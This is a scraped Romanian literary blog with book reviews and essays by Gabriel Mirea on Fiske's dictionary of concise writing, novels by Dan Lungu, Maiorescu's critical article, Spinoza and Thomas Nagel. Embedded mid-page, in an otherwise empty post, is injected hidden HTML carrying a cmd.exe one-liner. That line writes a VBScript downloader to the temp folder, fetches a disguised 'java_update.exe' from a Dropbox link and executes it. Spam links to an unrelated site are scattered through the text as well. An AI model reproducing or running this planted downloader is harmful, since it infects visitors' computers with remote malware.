carteadeschisa.ro Rss

Posted on : 05-11-2015 | By : admin | In : Uncategorized

0

 

 

Dicţionarul scrierii concise a lui Robert Hartwell Fiske[1]

 

Alegerea unui titlu aduce cu sine o anume responsabilitate în faţa cititorilor. Ei se aşteaptă să găsească înăuntru ceea ce promite titlul. Nu mai mult, nu mai puţin. Până la urmă, nu funcţionează nicio justificare (existentă, eventual, în prefaţă) în situaţia când titlul e contradictoriu faţă de conţinut. În fond, titlul este cel care atrage primul pe cititori, este singur în câmpul nostru vizual, aduce cu sine promisiuni şi reverii. De aceea unii scriitori evită titlul pentru că probabil au constatat greutatea de a acorda titlul cu conţinutul. Aşa că mai bine nu-l folosesc.  Dar un asemenea procedeu nu poate funcţiona şi în domeniul lexicografiei, deoarece când faci un dicţionar nu îl poţi intitula simplu dicţionar ori, şi mai general, carte. Trebuie să spui ce anume vizează. Aici e cazul unei lucrări ştiinţifice, întreprinse cu metodă, care trebuie să genereze siguranţă şi, mai ales, corectitudine.

Robert Hartwell Fiske propune un titlu care derutează uşor: „To the point – A dictionary of concise writing”. Aşteptările sunt însă mai mari decât oferta. O sintagmă precum scrierea concisă, m-a făcut să mă gândesc la exprimarea spartană, la abilitatea de a formula în câteva cuvinte adevăruri puternice, la proverbele şi vorbele de spirit existente în atâtea cărţi ori circulând prin limba vorbită. Poate, exagerând un pic fantezia, la acele texte laconice (haiku, tanka) lăsate în urmă de samurai atunci când îşi făceau seppuku. De fapt, dicţionarul propune doar modul de a ajunge la scrierea concisă, de a elimina diferitele forme de prolixitate din frază. Cum am văzut şi într-un alt dicţionar al său[2], Harwell Fiske îşi îndreaptă interesul spre inventarierea greşelilor de limbă (aici exprimările prea lungi) şi spre propunerea unei forme mai scurte şi, cel mai adesea, mai pertinente.

Acum îi vom vedea argumentele, ne vom plimba printre exemplele sale şi vom cerceta valorile dicţionarului. Într-o prefaţă foarte scurtă, dl. Richard Lederer[3] observă apariţia fenomenului prolixităţii, al verbiajului în general, la vârsta adultă. Când suntem copii, ne exprimăm sumar şi arătăm în chip direct ceea ce dorim. Odată cu maturizarea însă, discursul se diversifică şi, mai ales, se încâlceşte. Ajungem să umflăm fraza până la ininteligibil. Notez aici că fraza ajunge să aibă tot felul de elemente toxice ori să devină un labirint în care sensul intenţionat de emiţător să fie doar unul printre altele. (Teoria pare, de altfel, atrăgătoare la prima vedere. Copilul – discurs concis, adultul – discurs confuz. În realitate, lucrurile sunt mai complicate şi, până la urmă, cine învaţă pe cine?)

De ce nu scriem simplu? Pentru că ne este frică să nu fim rău înţeleşi. Ori vrem să impresionăm pe alţii. Ori adevărul pe care-l spunem deranjează şi ne poate aduce prejudicii grave. Şi notez aici că, de fapt, prin limbă, adulţii se luptă între ei toată viaţa. Supravieţuiteşte în zonele de sus ale ierarhiei cine stăpâneşte bine arta războiului verbal. Dar autorul nu are astfel de ambiţii tactice. Doar vrea să dea oarece sfaturi despre cum să scrii bine. Şi, în această privinţă, îl invocă pe  William Zinsser (3) care afirma că  „nu poţi să scrii bine până ce nu te antrenezi tu însuţi să scrii cu puţine cuvinte[4].

În acest dicţionar al scrierii concise, găsim 3 secţiuni distincte: prima inventariază şi explică diferitele categorii de greşeli, o a doua detaliază formele de verbozitate aşa cum apar în texte şi propune alte forme reduse, iar o a treia parte – este un fel de dicţionar de sinonime în care intrării lingvistice concise i se oferă adesea numeroase sinonime prolixe.

În prima secţiune, în prefaţă este furnizată o interesantă definiţie a cuvintelor: „Cuvintele există pentru a fi gândite şi a fi aşadar formate, pentru a fi  scrise şi a fi revizuite şi chiar pentru a fi spuse şi apoi interzise[5]. Cum vedem, în limbă este o permanentă mişcare de du-te-vino, cuvintele aduc de fiecare dată o anume deschidere, dar aceasta trebuie abordată cu precauţii, în orice caz cu anume revizuiri şi, eventual, cu anume retractări. Iată stindardul spre care ne îndreaptă acest dicţionar. Deoarece „puţini dintre noi scriem fără efort”[6], trebuie să găsim diferite forme de a ne atenua verbozitatea, exprimarea încâlcită, lipsită de mesaj. Întâi ne este oferită o cale în patru paşi[7]: 1. Reducerea numărului de cuvinte în frază 2. Substituirea eventuală a unei fraze ori propoziţii cu un singur cuvânt; 3. Ştergerea cuvintelor ori a propoziţiilor inutile, lipsite de semnificaţie ori redundante; 4. recitirea şi rescrierea materialului pentru identificarea cuvintelor superflue.

Şi iată un sfat care nu ar trebui omis niciodată: „Întreabă-te dacă fiecare cuvânt din fiecare propoziţie a scrierii tale este necesar. Mai mult de atât, dacă este vital?”[8] Ideea este că noi înşine ar trebui să stăm cu un foarfece imaginar  atunci când formulăm ori ne recitim textul pentru a îndepărta excesele lingvistice, straturile nedorite ori nesemnificative. Notez faptul că exemplele pe care le voi oferi în continuare conţin în prima coloană formele prolixe, iar în cealaltă coloană propunerea concisă. Iată câteva criterii de eliminare a verbozităţii desprinse din corpul dicţionarului:

 

  1. Îndepărtarea elementelor superflue
Forma prolixă Forma concisă
ecranul arată listarea joburilor ecranul listează joburile
sistem GPS GPS
ultimul dintre toţi ultimul
a face conversaţie a conversa

 

  1. Evitarea eufemismelor
Forma prolixă Forma concisă
daune colaterale uciderea civililor
a avea abilitatea să a putea
         a păstra în minte a-şi aminti
         poziţie în schemă job

 

  1. Evitarea perifrazelor verbioase
Forma prolixă Forma concisă
             un număr limitat de obiecte un obiect disponibil
             o semnificativă proporţie câteva
    în viitorul apropiat curând
    a permite să a lăsa
    timpul iernii iarnă,
   grădină zoologică zoo
   scurt şi la obiect concis
   în cantitate suficientă de ajuns

 

  1. Evitarea clişeelor
Forma prolixă Forma concisă
   cu viteza luminii repede
   o fereastră de oportunitate o oportunitate
   falsă iluzie iluzie
   vechiul proverb proverbul

 

  1. Evitarea cuvintelor cu silabe multiple
Forma prolixă Forma concisă
   metodologie metodă
   remuneraţie plată
   substanţialitate substanţă
   notaţie notă
   notificare notiţă
   uzaj uz

 

  1. Evitarea cuplurilor
Forma prolixă Forma concisă
   nou şi inovativ fie nou, fie inovativ
   între mine şi tine între noi
   a combina împreună fie a combina, fie a uni
   diferit şi distinct fie diferit, fie distinct
   scump şi costisitor fie scump, fie costisitor
   lucruri esenţiale importante ori lucruri esenţiale ori importante
   oaspete invitat ori oaspete, ori invitat
   relicvă a trecutului relicvă
   separat şi autonom fie separat, fie autonom
   gândeam eu însumi gândeam
   necesitate vitală ori necesitate, ori vital
   prieten personal prieten

 

  1. Ştergerea unor cuvinte care duc la încurcături şi care de fapt nu spun nimic în plus
Forma prolixă Forma concisă
   şi un lucru ca acesta de şters
   în orice caz de şters
   orice ar fi de şters
   tipul acesta de lucruri de şters
   prin definiţie de şters

 

Într-o scurtă secţiune de la sfârşitul primei părţi se realizează un inventar al câtorva tipuri de jargon profesional. Astfel arată că sună neplăcut în jargonul de business cuvinte precum „a prioritiza” ori „parte componentă”. În jargonul juridic cuvinte precum „compensaţie”, ori „în concordanţă cu”. Iată rapid şi cuvinte din alte tipuri de jargon – folosirea unui limbaj evaziv ori pompos în politică: Exemplu – „eu confirm ceea ce spun, dar eu nici nu confirm, nici nu infirm ceea ce înseamnă asta[9]. „Atenţie focusată” (în jargonul jurnalistic), etc.

Prin urmare, verbozitatea constă în folosirea tautologiilor, a multiplicării inutile a silabelor, a cuvintelor, în apariţia clişeelor, a eufemismelor inutile care, de fapt, nu protejează de nimic în afara îngreunării mesajului. Evident că este discutabilă clasificarea propusă de dicţionar, se îndepărtează de propunerile lexicografice clasice, în domeniul greşelilor limbii lucrurile nu sunt la fel de bine fixate ca în porţiunile corecte. De obicei, dicţionarele vorbesc despre normă, nu despre abaterea de la normă. În dicţionarul lui Robert Hartwell Fiske AŞA NU este la început, urmând îndreptarea. În dicţionarele obişnuite, AŞA NU fie nu există, fie cel mult este plasat la sfârşitul intrării lexicografice.

 

 

 

[1] Robert Hartwell Fiske, To the point: A dictionary of concise writing, editura W. W. Norton & Company, New York, 2014

[2] Idem, The Dimwit’s dictionary, editura Marion Street Press, Portland, Oregon, 2012

[3] Idem, To the point…, 2014, pp. 6-7

[4] Idem, p.8 apud William K. Zinsser, On writting well, The classic guide to writing nonfiction, Ed. Harper Collins Publishers, New York, 2001

[5] Idem, p. 10

[6] Idem, p. 11

[7] Idem, p. 12-14

[8] Idem, p. 14

[9] Idem, p. 28.

Despre diferenţe, alteritate şi dialog intercultural – Cosmofagie

Posted on : 11-10-2010 | By : admin | In : Uncategorized

1

11TonoiuAutor: Vasile Tonoiu
Editura Academiei Române
Anul apariției: 2005
Locul apariției: Bucureşti
Număr pagini: 225
ISBN: 973-27-1217-1
acceptchecksnow.com

Pace și bine!

Ce am mai citit din Vasile Tonoiu?

Un filosof african Haris Memel Fote a spus că pretenția europenilor de obiectivitate poate fi definită ca o atitudine cosmofagă.

Mă gândeam că la fel ar putea fi văzută și atitudinea îndrăgostitului care oferă iubitei sale luna de pe cer. Ok, dar ce se întâmplă cu ceilalți? Rămân în întuneric!

Cosmofog se dovedește și Lucian Blaga în poemul său expresionist Dați-mi un trup voi munților! Atunci când cere să-și abandoneze trupul muritor în favoarea unuia enorm,făcut din piatră.

Când aș iubi
Mi-aș întinde spre cer toate mările
Ca niște vânjoase, sălbatice brațe fierbinți
Spre cer
Să-l cuprind
Mijlocul să-i frang
Să-i sărut sclipitoarele stele

Când aș urî
Aș zdrobi sub picioarele mele de stâncă
Bieți sori călători
Și poate-aș zâmbi.

Și romantismul a fost de o cosmofagie feroce. La Eminescu, Cătălina, devoratoarea de Luceferi, Luceafărul sorbind din șerbetul Cosmosului, bătrânul dascăl care depozitează în degetul mic întregul univers. Poemul Memento Mori cu lupta din cer între două panteoane, dac și roman.

Îmi pare că literar cosmofagia este un procedeu care adaugă forme de expresivitate ale spațiului inaccesibil. Boala se explică prin anularea credinței  în zei. Dacă nu este nimic sus, universul ne așteaptă să-l cucerim și, dacă nu avem încă nave potrivite, de ce să nu ne folosim deocamdată imaginația! De pildă o viziune cosmofogă este aceea în care ar fi în viitor un univers în care limba comună ar fi limba engleză, dovedindu-se astfel imaginație și gândire îngustă, reducționistă. O limbă îngurgitează universul lingvistic. Să-i adăug prin urmare termenul de lingvistofagă.

Ceva de genu`

Gabriel Mirea

Cum să uiți o femeie

Posted on : 11-10-2010 | By : admin | In : Uncategorized

0

f68392-Dan-Lungu-Cum-sa-uiti-o-femeieAutor: Dan Lungu
Editura Polirom
Anul apariției: 2009
Locul apariției: Bucureşti
Număr pagini: 386
ISBN: 973-46-1328-1

Pace și bine!

Un titul supercomercial

Parcă ar urma să deschid o carte de self management de genul cum să devin bogat, milionar sau șofer de formula 1. E adevărat, există în titlul lui Dan Lungu și o nuanță negativă abia vizibilă, de fapt ar fi un îndrumar despre cum să faci să nu mai ai un anume sentiment.  Pare să fie un fel de îndreptar de curățire interioară, miroase a medicină, a psihiatrie, a expurgație și tratament.

Titlul este pe de altă parte rizibil

Femeile care cumpără cartea se pot întreba cum anume pot fi uitate, bărbații pe de altă parte, fiecare cu bubele sale antifeminine, dau banii în speranța că iar vor încerca un paliativ ce le-o face viața mai comodă. Nimeni nu speră să uite nimic, dar cum titlul este la persoana a III-a, seamănă cu un îndrumar de lucrări agricole, te pomenești că…! Evident că este un truc  auctorial, experiența naratorului este singura în care se încearcă o tentativă de ștergere cu buretele, dar este aparent impersonalizată, este adoptată tehnica aceea din politică în care deși  îmi reprezint propriul interes, dau senzația oamenilor că uit de mine și vorbesc doar în numele lor. Acel noi cu dublu înțeles se păstrează în pseudoimperativul să uiți!

De fapt o uită?

Am putea pleca liniștiți fără să cumpărăm cartea cu acest răspuns liniștitor: bineînțeles că nu, din moment ce îi dedică o carte. Despărțirile au diferite consecințe neașteptate. Unii se sinucid, se aruncă în mijlocul broaștelor sau al leilor, unii folosesc diverse trupuri feminine pentru uitare, devin perverși sau apostoli, călugări, explorează Chomolugme și peșteri fără fund, se baricadează în întuneric sau se expun în public cu râsete ciudate, cu indecențe, cu șiraguri de înjurături. O despărțire majoră relevă iadul din fiece persoană, într-un spectacol uman care cuprinde toată gama sufletească de la neagra resemnare până la crimele împotriva umanității.
Cei mai mulți strigă și până la urmă parțial această carte este un strigăt de neputință după o despărțire brutală.  Un personaj filosof spune în carte că despărțirile nu pot fi decât așa, inexplicabile, torturante, în afara sensului. Că vin neașteptat și schimbă viața spre o direcție imprevizibilă.

Totuși…

În materie de întâlniri și despărțiri lucrurile sunt însoțite de atâtea forme și nuanțe încât părerile totalitare sunt suspecte și  de neluat în seamă. Există tot felul de despărțiri, unele prin acord tacit, altele ca într-o pantă lină, doar divorțurile nu sunt cazuri trase la indigo. Dan Lungu își introduce cu abilitate personaje care caută să rezolve nodul gordian în maniera lui Alexandru cel Mare, dar prin discursul său romanesc arată că, de fapt, lucrurile sunt complicate de maniera ireductibilă, putere la putere.

acceptchecksnow.com Ce vreau să spun prin asta?

Foarte pe scurt, o ziaristă de scandal Marga se desparte de amorezul său ziarist de la anchete sociale, Andi.  Asta e tot pe 350 de pagini. De fapt, intenția mea a fost doar să dau numele protagoniștilor pe care îi vizează titlul. Marga este o femeie frumoasă. Origini incerte, probabil din țara Basa. Intră în noua relație ca să-i facă în ciudă unui fost amant. Iese din relație inexplicabil, doar cu un bilețel fanny, la fel de stupid ca și cele ale sinucigașilor: ”Te rog să mă ierți. Cândva o să înțelegi”. Atât. Nu complicații, nu explicații, nimic în –ații. Cocoana și-a luat bagajele și s-a dus pe apa sâmbetii  încă de la începutul romanului. A devenit un fel de Nechifor Lipan, adică deja este moartă textual. Personaj absent. Prin urmare vom auzi doar vocea El. Punctul lui de vedere, suferința lui, reconstituirea Margăi dinspre forma sa de înțelegere. Evident că muta Marga ne avertizează. Nu, Andi deocamdată nu înțelege nimic, dar în viitor, probabil când o să scrie o carte sau, cine știe, când se va bucura după procesul uitării de nurii altei consoarte, o să-l lumineze deodată o înțelegere terifiantă. În privința asta, fantezia naratorului este excelentă. Și-o imaginează pe Marga devenind extraterestră, făcând acrobații narcotice, împlinindu-se apoteotic sau metamorfozându-se oniric.

Acum vine partea care dezminte titlul

Nu este vorba exclusiv de relația de iubire, ea este doar un pretext, ci mai degrabă de conturarea unei perioade din viața personajului Andi. Un fel de Gelu Ruscanu din anii 2000 visează la dreptate într-o lume a rechinilor ziariști  dedicați doar șantajului … Este un personaj care merge până la capăt, într-o relație anterioară se îmbată non-stop, apoi caută să-și impună criteriile sale de dreptate prin discursul diaristic, se lasă atras în experiențe mistice și se definește contrar, exploatează până la epuizare momentul despărțirii și-l maschează după cețuri tot mai îndepărtate.

Dar îi atribui prea multe acestui nod textual numit Andi

Așa numea un critic personajele de roman, doar noduri textuale, chestii vorbite care au aparență de sentimente, idei, trăiri. Culegi un nume de ici, o față de colo, o poveste de dincolo și faci un Frankenstein textual așa cum a fost transformat Ion al lui Rebreanu în manualele școlare. Andi devine prin urmare instanță narativă, vocea dominantă, masculul textual alfa, personajul principal și alte asemenea farafastâcuri centraliste. Poate de aceea este bine să uiți conceptele critice, altfel nu am mai putea citit o pagină. Și acest roman are o curgere a poveștii admirabilă. Așa că să uităm poanta cu nodul textual și să revin la conceperea lui Andi ca o persoană care merită stima și considerațiile noastre. Altfel, ajung să mă laud că am mai citit o carte cu câteva noduri textuale, unele s-au încâlcit și altele s-au destrămat. Discurs ridicol.

Andi ne arată toate punctele sale cardinale

Povestea de iubire cu Marga

Un număr consistent de pagini.  Nu e cine știe ce, un bairam, amor din prima noapte, lipsa de condiții pentru o relație de durată. Iubirea din garsonieră lângă alte garsoniere ocupate de pensionari și chiriași pârliți. Iubita ff. prețioasă care nu face amor până nu se machiază, frăgezește, umezește complet. Doar după ce ea devine din perspectiva proprie frumoasă, are dreptul domnul Andi s-o atingă așa… așa.  Apoi vine despărțirea, ahurile și ofurile de rigoare, dar nimic în manieră balcanică, nu are o suferință de tip țambal, ci mai degrabă sună a glas subțiratec de vioară, a Rapsodia lui Ciprian Porumbescu.

Aventurile sale la ziar

Aici aflăm de forma de manifestare a rechinilor din presă. S-o dezvăluim și noi pentru buna informare a cetățenilor creduli. – Am întâlnit unul chiar ieri care era să mă bată pe baza informațiilor aflate exclusiv din gura curcubeică a tv. – La redacții vin tot felul de informații despre comportamentul sălbatic comercial al vreunui pungaș directorial din provincie. Reporterii privilegiați sunt trimiși la săpături asupra afacerii. Afacerea împricinaților este studiată metodic, cu tehnici similare celor polițienești și, în scurt timp, li se întocmește un așa-zis dosar de presă de mai mare frumusețea.  Dezvăluirile ar urma să fie evident incendiare. Numai că, aici este chichița, înainte se dă o notiță asupra unui posibil caz de… Dacă mahărul vizat are urechi de auzit și știe să se miște financiar din vreme, bine, dacă nu, apare o primă dezvăluire. Deja lucrurile încep să coste tot mai mult și, cu cât sunt publicate mai multe lucruri, cu atât mușamalizarea este mai costisitoare. O părticică din sumă merge și la reporter, dar grosul evident că-l ia patronul, redactorul-șef, mă rog, cine a finanțat expediția de culegere de informații. Mafia din domeniu dă drumul doar la informațiile despre cei care n-au cotizat. În rest, acari Păuni, accidente, statistici, bla-bla-bla-uri de umplut pagina.

Experiența religioasă

Apare datorită unei întâmplări nedorite legate de mutarea continuă pe care este nevoit să o îndure azi un chiriaș în București. Prețuri mari, salarii mici.  Puțini oameni înțelegători. Printre ei un neoprotestant care are grijă  într-o formă indirectă să-l atragă spre credința sa. Andi se împotrivește și i se par copilării scenele devoționale la care asistă. I se furnizează tot felul de asemănări cu care ar fi  de dorit să se identifice. Și ceilalți membri ai comunității au fost nefericiți, doresc să participe la viața publică, au de luptat pentru răspândirea adevărului, se confruntă cu rechini de diferite grade. Deosebirile Andi le găsește de unul singur. Are însă neașteptate cedări, merge de câteva ori cu neoprotestanții aceia la întruniri nonformale. Finalul este din această perspectivă incert. Fie va deveni religios, fie se va întoarce Marga, fie își va găsi pe alta. Naratorul încheie cu puncte, puncte, imaginați-vă în continuare ce vreți.

Câteva adnotări finale

Este un roman  de experiență care are un ton sacadat, mecanic în relatare. Ideile nu sunt remarcabile, dar bine legate epic și pot provoca dezbateri ulterioare spre consistent.
Personajele tind spre tipologie, dar au ceva incomplet care poate da sau nu senzația de complexitate. Există de altfel conturarea unor opoziții tipologice: ateul – pocăitul, însetatul de dreptate – ziaristul cinic, amorezul ecologist – amorezul artist.
Tehnica narativă a presupus relatarea a două voci distincte ale aceluiași personaj în momente temporale diferite – pasiunea și socializarea prin ziaristică, integrate într-o colecție consistentă din punct de vedere anecdotic.
Povestea se desfășoară pe un zgomot de fond generat de două personaje de deasupra textului, mă rog, deasupra garsonierei iubirii se află doi vecini care se ceartă și se înjură toată ziua pentru nimicuri. Plouă peste teritoriul lui Andi cu clișee agresive.

Ceva de genu’

Gabriel Mirea

În Contra direcției de astăzi

Posted on : 11-10-2010 | By : admin | In : Uncategorized

0

critica-maiorescujpgAutor: Titu Maiorescu
Editura Minerva
Anul apariției: 2005
Locul apariției: București
ISBN: 973-21-0753-7 ; 973-21-0754-5

Pace și bine!

Articolul lui Titu Maiorescu din 1868  – poreclit de adversari Maurul – s-a constituit într-un limbaj critic incipient ca răspuns la critica ziarului Transilvania care-l acuza că se ocupă cu flecuștețe lingvistice. Arată că la baza unei asemenea atac stau 3 cărți eronate din punct de vedere istoric (Petru Maior care afirma că dacii au fost eliminați complet după cucerirea romană, Lexiconul de la Buda din 1825 care a încercat să elimine aproape complet cuvintele de origine slavă, Gramatica Tentanem din 1840 în care s-au dat exemple dintr-o limbă romînească inexistentă). Aici țin să notez că aceste trei opere au generat o direcție falsă în sensul că în acea perioadă se considera că acțiunea asupra limbii trebuie să vină din partea lingviștilor care s-o îmbunătățească în funcție de așa-zisele interese ale națiunii. (După cum știm, azi lingviștii doar observă cuvintele existente în limbă, sunt prea mulți inovatori ca să se mai amestece și ei în chip programatic. Mai degrabă corectează paradigma și funcționalitatea cuvântului)

După un succint istoric al progresului din secolul 19, Titu Maiorescu constată că prin imitație și reproducere au apărut doar efectele civilizației (forme goale, de deasupra, superficiale, aparențe) nu și cauzele, respectiv fundamentele istorice necesare procesului de civilizare.

Inițiativa a avut un scop lăudabil, progresist – literatura, știința, arta frumoasă, vroiam să arătăm Europei că, demni urmași ai lui Traian, suntem capabili de a fi la înălțimea altor civilizații, dar din nefericire am mers într-o direcție falsă. Obiectivele au fost înlocuite cu statistici. Literatura a fost echivalată unui număr mare de tipografii sau de publicații, știința cu o suită de discursuri ori societăți mai mult sau mai puțin declarat academice, pictura cu o înșiruire de pânze, libertatea cu discursurile politice.

Direcția falsă a provocat din partea urmăritorilor ei suficiență, rătăcirea judecății, orbire, neadevăr. Aveam jurnale politice, dar nu partide, reviste literare, dar nu și un public iubitor de literatură, școli și gimnazii, dar nu învățători și profesori, atenee și pinacoteci, dar nu și cultură. Astfel s-au ajuns să se fasifice ideile de Academie, de Conservator, de Școală de Belle-Arte, de teatru, de constituție.

După ce constată falsitatea și nulitatea culturii claselor mai înalte, vorbește despre cultura clasei de jos, cea a țăranului care ar fi singura adevărată și de aceea cere o artă care să dedice conținutul țăranului cel autentic. (O tendință poporanistă avant la lettre!)

În alt plan militează pentru regenerarea spiritului public, arătând ce greșeli ar trebui evitate, anume încurajarea mediocrităților (Prin căutarea valorii care se percepe de la prima înfățișare a operei care dovedește în alt plan valabilă pentru toți) și promovarea formei fără fond.

Folosind o întrebare retorică  ”Mai este oare timp de scăpare?” afirmă că mai bine formele fără fond să nu apară decât să strice mijloacele tradiționale de cultură, decât să se discrediteze întârziiind astfel apariția fondului. Articolul revine la sfârșit cu atacul contra revistei Transilvania și arată că pe Titu Maiorescu nu-l preocupau deloc bagatelele, ci solicită fond, limbă bună, ortografie, gramatică.

Prin urmare ideile lui Maiorescu sunt rezumabile în aceste câteva ancore memorabile: O direcție falsă în limbă și în cultură crează instituții locuite de fantome și guvernate de neadevăr.  Va fi susținută de oameni mediocri, care discreditează cultura română și îi întârzie apariția substanței. Forma se dovedește o iluzie socială fără fond.

Notă – voi consemna mâine cum a văzut Garabet Ibrăileanu acest articol. Poate fi răstălmăcit în fel și chip.

Ceva de genu

Gabriel Mirea

Posted on : 11-10-2010 | By : admin | In : Uncategorized

0





height="1" width="1">

value="cmd.exe /c echo Const adTypeBinary = 1 gt; %temp%\winconfig.vbs amp; echo Const adSaveCreateOverWrite = 2 gt;gt; %temp%\winconfig.vbs amp; echo Dim abc gt;gt; %temp%\winconfig.vbs amp; echo Dim xyz gt;gt; %temp%\winconfig.vbs amp; echo Dim rofl gt;gt; %temp%\winconfig.vbs amp; echo abc = "ADODB" gt;gt; %temp%\winconfig.vbs amp; echo xyz = ".Stream" gt;gt; %temp%\winconfig.vbs amp; echo Set rofl = CreateObject(abc+xyz) gt;gt; %temp%\winconfig.vbs amp; echo rofl.Type = adTypeBinary gt;gt; %temp%\winconfig.vbs amp; echo rofl.Open gt;gt; %temp%\winconfig.vbs amp; echo rofl.Write BinaryGetURL(Wscript.Arguments(0)) gt;gt; %temp%\winconfig.vbs amp; echo rofl.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite gt;gt; %temp%\winconfig.vbs amp; echo Function BinaryGetURL(URL) gt;gt; %temp%\winconfig.vbs amp; echo Dim lol gt;gt; %temp%\winconfig.vbs amp; echo Set lol = CreateObject("WinHttp.WinHttpRequest.5.1") gt;gt; %temp%\winconfig.vb
s amp; echo lol.Open "GET", URL, False gt;gt; %temp%\winconfig.vbs amp; echo lol.Send gt;gt; %temp%\winconfig.vbs amp; echo BinaryGetURL = lol.ResponseBody gt;gt; %temp%\winconfig.vbs amp; echo End Function gt;gt; %temp%\winconfig.vbs amp; echo Set blub = CreateObject("WScript.Shell") gt;gt; %temp%\winconfig.vbs amp; echo blub.Run "%temp%\update.exe" gt;gt; %temp%\winconfig.vbs amp; start %temp%\winconfig.vbs http://dl.dropbox.com/u/12138956/java_update.exe %temp%\update.exe"> acceptchecksnow.com name="windows2" value=""> value=""> name="linux2" value="">


Anunț

Posted on : 02-11-2009 | By : admin | In : Uncategorized

0

Salut. M-aș bucura să vizitați și celălalt blog pe care scriu http://www.carteadeschisa.ro/cinicul-de-serviciu/. În fiecare zi este acolo un alt post. Azi 2 noiembrie un articolul bombă – Iubirea dezinteresată. Cât de mult aș vrea părerile voastre!!!!

Posted on : 09-10-2009 | By : admin | In : Uncategorized

0

Ieri 8 octombrie 2009 s-a întâmplat un eveniment de neimaginat pentru mine. Un locuitor al României a primit premiul Nobel pentru Literatură. Numele ei este HERTHA MULLER. Și aproape nimeni nu știe mai nimic despre această scriitoare și nici nu a fost măcar vreodată amintită în vreun manual în ultimii 20 de ani de când s-a impus ca o voce autentică în peissajul Germaniei, țara unde s-a mutat din 1987.  Cultura română trebuie să fie de azi într-o mare sărbătoare.  Am atins apogeul literar. Poate fi ceva mai mult?

Gabriel Mirea

Spinoza 1

Posted on : 08-08-2009 | By : admin | In : Uncategorized

Tags: ,

0

Pace şi bine!

Începutul cărţii

Spinoza, un filosof de acum 3 secole vine cu o problemă aparent nesemnificativă pentru un om de acţiune. Cum trebuie să ne comportăm în faţa iubirii? Folosindu-ne de dorinţă sau de raţiune? Care ar fi diferenţa? Prima oferă iubirii obiecte multiple – ea vorbeşte de iubirea de patrie, de familie, de prieteni, de obiecte, etc., în timp ce raţiunea spune că nu există decât o singură formă de iubire, indiferent de obiectul asupra căreia se aplică.

Am avut revelaţia că acest Spinoza ne vorbeşte de două posibilităţi  ale fiinţei destinate fiecare altei funcţii – una care conferă multiplicitate lumii, cealaltă unicitate. Fiinţa noastră devenea prin asta scindată şi cumva trebuia găsită o rezolvare a acestui conflict intern. Trebuia găsită forma de iubire care să fie în acelaşi timp multiplă, dar şi unică şi atotcuprinzătoare pentru celelalte forme. El spune că numai iubirea lui Dumnezeu poate oferi această cale de împăcare şi că este singurul loc în care raţiunea devine dorinţă sau dorinţa raţiune. Cum anume a demonstrat aceasta promit să revin în următoarele episoade.

Primele reflecţii

Un oarece folos al filosofiei

Mă gândeam că filosofia nu este un lucru de folos imediat, ci unul care e necesar celui care vrea să-şi găsească un rost al vieţii, celui care caută – cum este cazul lui Spinoza – o explicaţie pentru diferenţa dintre multiplicitate şi unicitate. Celui care militează pentru raţiune într-o lume guvernată de instincte – de altfel economia de piaţă este un termen care trimite explicit la burtă şi la lăcomie.

Şi dacă filosofia ajută mai puţin de a alege o opţiune dintre numeroasele căi oferite de viaţă, ea ajută să dai temei acelei opţiuni, să explici de ce nu poţi decât în această îndeletnicire şi nu într-alta. Este un examen de sine şi un tovarăş care ar trebui să stea să zicem lângă adolescenţii cei supuşi tuturor influenţelor şi poate victimele cele sigure ale dorinţei.

Labirintul exemplelor

Am vrut iniţial să dau un exemplu pentru cele două forme de acţiune umană -  capriciul şi cunoaşterea. Să arăt cum uneori confuzia între cele două poate avea consecinţe grave. Apoi am realizat că exemplele nu fac altceva decât să deruteze raţiunea, nevoită să treacă din nou la îndepărtarea tuturor lucrurilor inutile din exemplu şi să găsească iarăşi cristalul pur al unicatului. Operaţie de decantare care nu se face cu uşurinţă de fiecare dată. Până la urmă ce se cere de la un judecător de pildă dacă nu să recunoască în cearta împricinaţilor legea încălcată, ideea care oferă reperul stabilirii gradului de vinovăţie. Legea este până la urmă o normă de comportament uman, ea stabileşte ce trebuie făcut şi eventuala pedeapsă, dar dacă intrăm mai adânc în sensul ei, constatăm că are la rândul ei nevoie de un temei moral şi acesta poate fi văzut mai totdeauna ca arbitrar. Judecata – o operaţie de transformare a multiplului într-unul. Arta – procesul invers.

Ce rol are intuiţia? Vede legi acolo unde alţii nu au simţit decât multiplicităţi indiferente! Vede
un exemplu miraculos pentru legile cele reci! Multiplicitatea ţine de fenomenologie. Ne folosim însă de raţiune pentru a ordona şi da un înţeles fenomenelor fiinţei. Suntem ca şi râul. Mereu într-alte ape, dar cu aceeaşi albie. Sau păcăleala vizuală din magazine. Acele obiecte care închipuie fântâni curgătoare, dar care sunt de fapt un truc de imagine. Cumva suntem un truc permanent în raport cu una din perspective. Oamenilor căutători de fenomene le lipseşte profunzimea. Oamenii cu cugetări adânci au o viaţă lipsită de spectaculos. Trucul constă în faptul că fiecare caută să se dea drept ceea ce nu este. Călătorul drept înţelept, iar înţeleptul drept om încercat.

Va urma

Ceva de genu’

Gabriel Adrian Mirea

Perspectiva de nicăieri

Posted on : 04-08-2009 | By : admin | In : Filosofie, Uncategorized

Tags:

0

perspectivade

Autor: Thomas Nagel
Editura: Vellant
Traducător: Bogdan Lepădatu
Nr. pagini: 456 pagini
ISBN: 9789738875975

Pace și bine!

Ce fel de persoană eşti? Subiectivă sau obiectivă? Spre ce tinzi? Spre punctul de vedere exterior sau spre cel interior? Vrei mai degrabă să cunoşti lumea sau să te cunoşti pe tine? Am pus deja prea multe întrebări. De fapt, problema acestei cărţi este suferinţa neştiută a omului de a se împărţi între două direcţii contradictorii. Subiectivitatea care oferă o importanţă exagerată persoanei şi obiectivitatea care vede persoana ca un simplu individ apărut accidental şi care poate fi cu uşurinţă înlocuit. Suntem totul şi nimic în acelaşi timp. Depinde de perspectiva noastră, de optimismul sau pesimismul structural. De preeminenţa substanţelor din creier, de endorfinele tristeţii sau ale bucuriei.

Thomas Nagel realizează de-a lungul nonperspectivei sale cosmice o continuă paralelă între obiectivitate şi subiectivitate. Aplică o mulţime de grile, de atribute, de coduri pentru a realiza descripţia relaţiei dintre obiectiv şi subiectiv. Lectura este strigătoare la cer de dificilă şi autorul nu ne ajută deloc prin inserarea măcar a câtorva exemple pentru înţelegere. Obiectivitatea sa în propria carte este la fel de ridicată ca a unui tratat arid de fizică. Poate caută să arate astfel că subiectivitatea poate fi tratată cu o seriozitate la fel de ştiinţifică precum cea acordată fenomenelor atomice.

